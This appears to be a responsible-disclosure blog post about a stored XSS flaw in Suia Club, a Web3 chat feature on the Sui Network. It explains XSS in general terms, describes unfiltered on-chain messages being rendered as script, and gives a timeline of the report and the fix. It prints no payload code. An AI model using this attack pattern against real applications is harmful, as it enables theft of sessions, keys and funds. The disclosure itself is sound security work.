An XSS Vulnerability on a Sui Web3 Social Application called Suia has been Found and Fixed.
kriss_, the Founder of Scallop, uncovered a critical XSS vulnerability within Suia, a prominent Sui-based Web3 Social Application. Upon his discovery, kriss_ promptly reported the issue to the Suia team, which verified the vulnerability and implemented a fix at commendable speed.
What is Suia?
Suia is a Web3 social application on the Sui Network, backed by entities including the Sui Foundation, HashKey, SevenX, EVG, BingX, and Y2Z. It provides features like creating Sui NFTs and facilitating on-chain NFT gifting and auction activities. The project’s token symbol is SUIA, and it has recently introduced social features like Social Coin and Club.
The user base of Suia consists of individuals such as the co-founders of Mysten Labs, key opinion leaders, and retail users within the Sui ecosystem, indicating its significance as an application within this network.
What is Suia Club?
On February 7th, Suia launched its Club feature. In this chat room, users must hold the platform’s native Social Coin to participate, according to the details shared on their platform and from user discussions.
The Club’s integration with the Sui Network means all messages are stored on-chain, potentially offering greater transparency and immutability. Users can send and delete messages and use zkSend for transactions with $SUI, the platform’s cryptocurrency.
The feature supports multiple languages and emojis to enhance the user experience. This initiative is part of Suia’s broader effort to integrate social interaction with blockchain technology, providing a space where users’ interactions are permanently recorded on the blockchain.
What is XSS?
Cross-Site Scripting (XSS) attacks are an injection type in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally as a browser-side script, to a different end user. Flaws that allow these attacks to succeed are widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser cannot know that the script should not be trusted, so it will execute it. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.
What happened?
The Suia Club’s message-sending feature allows users to post text strings onto the blockchain. Suia’s front end retrieves the strings and displays them in the browser’s front end.
Usually, when developers try to take some data from the database, traditional Web2 website development frameworks have specific standards for retrieving database data, including formatting, length, and filtering for malicious code.
However, a module to filter out malicious code was overlooked in the design of Suia’s native Club feature. This oversight enabled malicious users to send XSS payloads on the Sui Network, which the Suia front end executes by the browser after compiling, leading to attacks on all users who visit that page.
The following picture is kriss_’s Suia Club, showing the testing XSS payload is executing, the browser executing “<img>” as a broken picture.
We further let the client browser execute the JavaScript code fetched from the blockchain.
This transaction simulates an actual attacker sending an XSS payload. It can run ANY Javascript script on the visitor’s client side.
Timeline (UTC+8)
2024/02/07 3:08 PM — Suia Club Public Test
2024/03/01 9:03 AM — kriss_ was using Suia Club and found something suspicious.
2024/03/01 9:13 AM — kriss_ confirmed an XSS bug on Suia Club.
2024/03/01 9:19 AM — kriss_ try to connect Suia team.
2024/03/01 9:23 AM — kriss_ connected Suia team and reported the bug.
2024/03/01 9:58 AM — Suia team fixed the bug.
Conclusion
Cross-Site Scripting (XSS) vulnerabilities seriously threaten Web3 social applications, mainly where cryptocurrency transactions are commonplace. The XSS issue within Suia Club, which could potentially lead to the theft of private keys, session cookies, and unauthorized transaction manipulation, puts user assets and platform integrity at considerable risk.
Commend the Suia team for their swift response in identifying and addressing this vulnerability and hope all project teams are aware of and protected against attack vectors that bridge Web2 and Web3, ensuring comprehensive security measures are in place. Users must also elevate their security awareness, diligently verify the legitimacy of applications and the transactions they sign, and critically assess their risk tolerance when engaging with Web3 applications.
